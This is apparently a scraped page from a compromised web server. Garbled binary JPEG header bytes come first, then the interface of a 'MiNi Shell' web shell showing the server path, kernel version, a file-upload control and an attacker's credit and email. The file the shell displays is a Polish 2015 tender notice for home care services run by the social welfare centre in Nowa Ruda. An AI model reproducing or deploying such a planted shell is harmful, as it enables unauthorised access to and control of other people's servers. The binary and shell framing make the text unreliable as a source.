JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150914/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150914/239420-N-2015.html

<p class="kh_header"><b>Nowa Ruda: Świadczenie usług opiekuńczych podopiecznym Miejskiego Ośrodka Pomocy Społecznej w Nowej Rudzie w ich miejscu zamieszkania w okresie od 01.11.2015r. do 31.10.2017r.</b><br>
<b>Numer ogłoszenia: 239420 - 2015; data zamieszczenia: 14.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Kolejowa 18, 57-400 Nowa Ruda, woj. dolnośląskie, tel. 074 8721056, faks 074 8721166.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.mops.nowaruda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług opiekuńczych podopiecznym Miejskiego Ośrodka Pomocy Społecznej w Nowej Rudzie w ich miejscu zamieszkania w okresie od 01.11.2015r. do 31.10.2017r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie od  01.11.2015r. do 31.10.2017r. na terenie miasta Nowa Ruda usług opiekuńczych dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej, w ich miejscu zamieszkania. 
Przy świadczeniu usług opiekuńczych mają zastosowanie w szczególności przepisy ustawy z dnia 12 marca 2004.r o pomocy społecznej ( Dz.U z 30.01.2015r., poz.163)
Zakres usług opiekuńczych uzależniony jest od potrzeb podopiecznego, jego stanu zdrowia oraz jego sytuacji rodzinnej i obejmuje pomoc w zaspokojeniu codziennych potrzeb życiowych, opiekę higieniczną, zaleconą przez lekarza pielęgnację chorego jako wspieranie procesu leczenia oraz w miarę możliwości zapewnienie kontaktów z otoczeniem, a w szczególności:
ZAKRES USŁUG OPIEKUŃCZYCH PIELĘGNACYJNYCH
1. Zgłaszanie wizyt lekarskich, badań laboratoryjnych,
2. Pomoc w dotarciu i powrocie do placówki medycznej
3. Karmienie usługobiorcy,
4. Opieka higieniczno - sanitarna, w tym:
    a) mycie, kąpanie, czesanie, golenie chorego, mycie głowy, obcinanie paznokci,
    b) zmiana bielizny osobistej i pościelowej,
    c) przesłanie łóżka,
    d) pomoc w załatwianiu potrzeb fizjologicznych,
    e) zapobieganie powstawaniu odleżyn i odparzeń,
    f) układanie chorego w łóżku i pomoc przy zmianie pozycji chorego,
    g) pomoc przy ubieraniu.
5. Pielęgnacja zlecona przez lekarza, w tym m.in.:
    a) mierzenie temperatury, rozkładanie leków, podawanie leków drogą doustną,
        doodbytniczą, wziewną ( inhalacje) lub przez skórę ( wcieranie), oklepywanie ,
    b) stosowanie okładów i kompresów,
    c) zmiana opatrunków,
    d) realizacja innych, indywidualnych zaleceń lekarskich,
    e) realizacja recept oraz zakup środków higienicznych niezbędnych
        podopiecznemu.
ZAKRES USŁUG OPIEKUŃCZYCH GOSPODARCZYCH
1. Dokonywanie zakupu artykułów niezbędnych podopiecznemu do codziennej
     egzystencji - razem z nim lub samodzielnie,
2. Przygotowanie posiłków z uwzględnieniem diety zleconej przez lekarza,
3. Dostarczanie posiłków do mieszkań usługobiorców ze wskazanego punktu
    gastronomicznego, 
4. Podgrzanie, podanie i pomoc przy spożywaniu posiłków,
5. Utrzymywanie w czystości naczyń stołowych i kuchennych oraz sprzętu
    gospodarstwa domowego,
6. Współpraca z lekarzem i pielęgniarką środowiskową oraz pracownikiem socjalnym,
7. Wychodzenie z podopiecznym na spacer,
8. Bieżące sprzątanie pokoju oraz pomieszczeń użytkowych usługobiorcy (wytarcie
    kurzu, odkurzenie, mycie podłogi, mycie sprzętu AGD- lodówki i kuchni),
    codzienne wietrzenie pomieszczeń,
9. Generalne okresowe sprzątanie używanej części mieszkania usługobiorcy w tym :
     mycie okien, drzwi, podłóg, glazury, oświetleń, szafek kuchennych i czyszczenie
     mebli (od  zewnątrz i wewnątrz), pastowanie i froterowanie podłóg, pranie,
     sprzątanie  łazienki, prasowanie i zawieszanie firanek i zasłon, trzepanie i pranie
     chodników, trzepanie i pranie dywanów itp.,
10. Wynoszenie śmieci,
11. Palenie w piecu, przynoszenie węgla i wody
12. Pranie bielizny osobistej usługobiorcy,
13. Prasowanie,
14. Załatwianie spraw urzędowych (poczta, administracja, bank itp.),
15. Zgłaszanie napraw urządzeń domowych,
16  Utrzymanie w czystości sprzętu sanitarnego i urządzeń sanitarnych ( miednicy,
      kaczki, basenu, wanny, umywalki, nocnika, sedesu ),
17. Prowadzenie na bieżąco zeszytu wydatków i rozliczeń wydanych pieniędzy
     podopiecznego codziennie lub w terminach ustalonych,
18. Realizacja innych indywidualnych potrzeb podopiecznego - zleconych przez
     Ośrodek, np. :
     a) umożliwienie dotarcia podopiecznemu do  szpitala, ośrodka zdrowia lub domu pomocy społecznej przy użyciu własnego lub ogólnie dostępnego środka transportu,
     b) asystowanie i pomoc w dotarciu na cmentarz - grób najbliższych w związku ze Świętem Zmarłych itp.,
c)dowiezienie/powrót do placówki rehabilitacyjnej przy użyciu własnego lub ogólnie dostępnego środka  transportu.
Wykonawca zobowiązany jest do comiesięcznego pobierania od usługobiorcy obowiązkowej odpłatności za usługi opiekuńcze zgodnie z decyzją i odprowadzanie jej na konto Zamawiającego.
W razie zgonu podopiecznego Wykonawca zobowiązany jest do:
     1. wezwania lekarza celem stwierdzenia zgonu,
     2. wezwania dozorcy domu lub najbliższego sąsiada,
     3. zawiadomienia rodziny, MOPS.

Wykonawca świadczyć będzie usługi osobom uprawnionym, na podstawie decyzji administracyjnej wydanej przez Zamawiającego zgodnie z okresem świadczenia usług (tj. terminem rozpoczęcia i zakończenia świadczenia przyznanych usług), ilością godzin i zakresem ustalonym w decyzji przyznającej świadczenie.
Szacunkowa  miesięczna ilość godzin wynosi: 2020   
Szacunkowa miesięczna ilość osób korzystających z usług opiekuńczych wynosi: 90
Ze względu na specyfikę przedmiotu zamówienia faktyczna liczba osób, którym świadczone będą usługi i faktyczna liczba świadczonych godzin uzależniona będzie od liczby podopiecznych i ich zakresu potrzeb i zmieniać się będzie w okresie trwania umowy. Zamawiający zastrzega sobie prawo zmniejszenia liczby osób objętych usługami oraz/lub  liczby godzin usług. Ewentualne zmniejszenie wielkości zamówienia nie będzie skutkowało odpowiedzialnością Zamawiającego, a Wykonawcy nie przysługuje żadne roszczenie finansowe. W tej sytuacji Zamawiający zapłaci Wykonawcy za faktyczną liczbę godzin wykonanych usług.

Wymiar godzinowy obejmuje 60 minut świadczenia usług w miejscu zamieszkania świadczeniobiorców, a także wykonanie na ich rzecz zleconych czynności poza miejscem zamieszkania świadczeniobiorców, takich jak np. załatwienie spraw urzędowych świadczeniobiorcy, dokonanie niezbędnych zakupów, czas wizyt u lekarza, realizacji recept itp. Godzina usługi nie obejmuje czasu na dojście/dojazd opiekuna do świadczeniobiorcy.

Usługi będą świadczone od poniedziałku do piątku w godzinach od  7.00 do 21.00.; 
z zastrzeżeniem, iż w szczególnie trudnych sytuacjach socjalno-bytowych jak i zdrowotnych podopiecznych MOPS świadczenie usług odbywać się będzie także w weekendy i w święta w godzinach od 7.00 do 18.00.

Podstawą udzielenia usług będzie każdorazowe zlecenie-decyzja administracyjna Zamawiającego, która będzie zawierać:
imię i nazwisko oraz adres zamieszkania osoby, której przyznano świadczenie,
okres świadczonych usług oraz ich wymiar godzinowy,
zakres świadczonych usług,
wysokość odpłatności świadczeniobiorcy za świadczone usługi.
Dopuszcza się możliwość ustnego (telefonicznego) przekazania zlecenia-potwierdzenie tego faktu nastąpi niezwłocznie decyzją administracyjną.

Wykonawca zobowiązany jest przystąpić do realizacji usług w ciągu 24 godzin od chwili zawiadomienia  o potrzebie ich zapewnienia, a w przypadku nagłym w ciągu 3 godzin od powzięcia informacji o potrzebie zapewnienia pomocy.

Wykonawca realizujący przedmiot zamówienia jest zobowiązany przekazywać pracownikowi świadczącemu usługi, każdego pierwszego dnia miesiąca, kartę pracy.
Karta pracy powinna zawierać następujące dane:
a) imię, nazwisko oraz adres osoby korzystającej z usług,
b) imię i nazwisko opiekuna
c) daty i godziny świadczonych usług
d) potwierdzenie wykonania usługi poświadczone własnoręcznym podpisem świadczeniobiorcy. W przypadku, gdy stan zdrowia świadczeniobiorcy nie pozwala na złożenie podpisu, dopuszcza się jego brak w karcie / ze stosowną adnotacją osoby wykonującej usługi/.
Karta pracy, w celu zapewnienia bieżącej kontroli przez Zamawiającego, powinna być wypełniana na bieżąco i udostępniana na żądanie Zamawiającego.

Zamówienie winno być wykonywane przez Wykonawcę, który:
a) zapewni osobę-koordynatora, posiadającą dyplom pielęgniarki lub wykształcenie średnie/wyższe medyczne,  kontrolującą i nadzorującą proces realizacji usług opiekuńczych,
b) zapewni co najmniej 15 osób świadczących usługi, z wykształceniem minimum podstawowym, sprawnych fizycznie i  intelektualnie,
c) dysponuje lub będzie dysponować lokalem na biuro, położonym na terenie miasta Nowa Ruda, wyposażonym w telefon oraz komputer,
d) zaopatrzy osoby wykonujące usługi, w miarę występujących potrzeb, w odpowiednie ubranie ochronne /fartuchy, maseczki rękawiczki/ dostosowane do zakresu niesionej pomocy,
e) będzie odpowiedzialny za jakość i terminowość realizowanych usług oraz będzie ponosił odpowiedzialność za szkody majątkowe i osobowe wyrządzone przez swoich pracowników w związku z wykonywaniem usług..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.11.00-3, 85.31.20.00-9, 85.31.12.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.11.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca złoży oświadczenie o spełnieniu tego warunku udziału w postępowaniu w zakresie art.22 ust.1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony jeżeli Wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy- w tym okresie, wykonał lub wykonuje co najmniej dwa zamówienia /1zamówienie=1umowie/, odpowiadające swoim rodzajem usługom stanowiącym przedmiot zamówienia (tj. usługi opiekuńcze). Zamówienie musi być porównywalne co do charakteru i wielkości niniejszego zamówienia. Wielkość porównywalna, to dla Zamawiającego usługi opiekuńcze prowadzone dla minimum 60 osób w skali miesiąca a okres świadczenia usług to minimum 6 miesięcy dla każdego jednego zamówienia. Jeżeli usługi są w trakcie realizacji, muszą być zrealizowane na dzień składania ofert dla minimum 60 osób w skali miesiąca a okres świadczenia usług to minimum 6 miesięcy dla każdego jednego zamówienia. Do powyższego wykazu należy dołączyć dowody, że usługi zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeśli Wykonawca złoży oświadczenie, że do wykonania usług zapewni:
lokal na biuro, położony na terenie miasta Nowa Ruda, wyposażony w telefon oraz komputer.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna w/w warunek za spełniony, jeśli Wykonawca złoży oświadczenie, że do wykonania usług zapewni: 
- jedną osobą, posiadającą dyplom pielęgniarki lub wykształcenie średnie/wyższe medyczne, która pełnić będzie funkcję koordynatora,  
- co najmniej 15 osób świadczących usługi, z wykształceniem minimum podstawowym, sprawnych fizycznie i  intelektualnie,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że posiada ubezpieczenie  od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia. Minimalna suma ubezpieczenia wynosi 100.000,00 złotych/ słownie: sto tysięcy złotych/.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - doświadczenie - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.mops.nowaruda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego; 57-400 Nowa Ruda ul. Kolejowa 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.09.2015 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Nowej Rudzie, ul. Kolejowa 18 w pok.  202 (sekretariat)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com